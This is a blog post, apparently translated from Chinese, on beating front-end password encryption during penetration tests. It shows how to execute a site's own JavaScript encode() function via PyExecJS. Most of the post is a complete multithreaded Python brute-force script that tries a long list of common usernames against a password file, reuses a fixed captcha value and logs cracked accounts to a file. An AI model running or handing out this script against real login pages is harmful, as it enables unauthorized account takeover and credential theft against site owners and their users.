Bypassing front-end encryption for brute-forcing (script included)
阿新 • Published: 2018-12-18
During a penetration test you sometimes find that the password is encrypted on the front end, which makes brute-forcing harder. The encryption is done by a custom function in a JS script, so the encoders built into Burp do not cover it. As shown below, with the password admin123 the encrypted result looks like this:
The encryption is done mainly by the `encode` function, so every password goes through this custom function.
On a recent engagement I picked up a new trick: run that JS file itself with a suitable tool or module and take its output. In Python this can be done with the PyExecJS package (imported as `execjs`), which hands the script to an installed JS runtime such as Node.js or PhantomJS and returns the result.
Installation
First install PyExecJS (a JS runtime such as Node.js or PhantomJS must also be installed):
pip install PyExecJS
Save the site's JS code locally (here as test.js).
# coding:utf-8
import execjs

# test.js is the site's front-end script saved locally.
with open('test.js', 'r') as jj:
    source = jj.read()

# Use the PhantomJS runtime explicitly; execjs.get() with no argument picks
# whichever supported runtime is installed (Node.js, PhantomJS, ...).
phantom = execjs.get('PhantomJS')
getpass = phantom.compile(source)
# Call the site's own encode(user, password) function and take its return value.
mypass = getpass.call('encode', 'admin', 'admin123')
print(mypass)
The code above yields the encrypted form of any given password.
Brute-forcing
Now to automate it: I wrote a Python script to run the brute-force.
# coding=utf-8
import threading
import requests
import execjs

URL = 'http://xxx/login'
UA = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0"

# Compile the site's front-end script once; each attempt then only calls encode().
with open('test.js', 'r') as jj:
    source = jj.read()
# execjs.get() picks whichever supported JS runtime is installed;
# execjs.get('PhantomJS') would force PhantomJS.
encoder = execjs.get().compile(source)


def brute(user, password, ua):
    # Run the site's own encode() so the submitted value matches what the browser would send.
    passwd = encoder.call('encode', user, password)
    print(user, password, passwd)
    post_data = {
        'userName': user,
        'userPass': passwd,
        # Fixed captcha value as in the original script; this only works while the
        # server keeps accepting it (e.g. it does not actually validate the captcha).
        'verifyCode': 'dsvx',
    }
    headers = {
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "Referer": "http://xxx/",
        "User-Agent": ua,
        "Connection": "close",
    }
    resp = requests.post(url=URL, data=post_data, headers=headers)
    print(user + "#" + password + " " + resp.text)
    # Success is detected by the absence of the login-failure message.
    if u'請檢查賬號和密碼' not in resp.text:
        print('*** find user:', user, 'with password:', password, '***')
        with open('accounts-cracked.txt', 'a') as f:
            # Record the plaintext password alongside its encoded form.
            f.write(user + ' ' + password + ' ' + passwd + '\n')


def main():
    tsk = []
    user_list = ['admin','noreply','hr','jobs','qiniu','lietou','demo','ceo','dev','root','service','fuwu','yunying','webmaster','wechat','weixin','weibo','tec','bd','bf','op','shop','test','pm','kefu','cdn','marketing','zhaopin','suggestion','warning','risk','system','pay','payment','management','feedback','guanli','ci','ad','td','news','cert','sdk','pmd','appstore','development','it','fankui','notify','bugs','security','sec','alipay','yunwei','message','support','ceshi','developer','notice','redmine','alert','kaifa','seo','git','vpn','jenkins','jira','zabbix','chandao','nagios','monitor','account','jubao','backup','open','openapi','github','reload','blacklist','buyer','caiwu','order','postmaster','pr','report','public','download','som','ops','devops','caigou','pmp','monit']
    # pass2.txt: one candidate password per line.
    with open('pass2.txt', 'r') as f1:
        for line in f1:
            password = line.strip()
            for user in user_list:
                t = threading.Thread(target=brute, args=(user, password, UA))
                tsk.append(t)
    for t in tsk:
        t.start()
        t.join()  # join() right after start() runs the attempts one at a time


if __name__ == '__main__':
    main()
Screenshot of the result: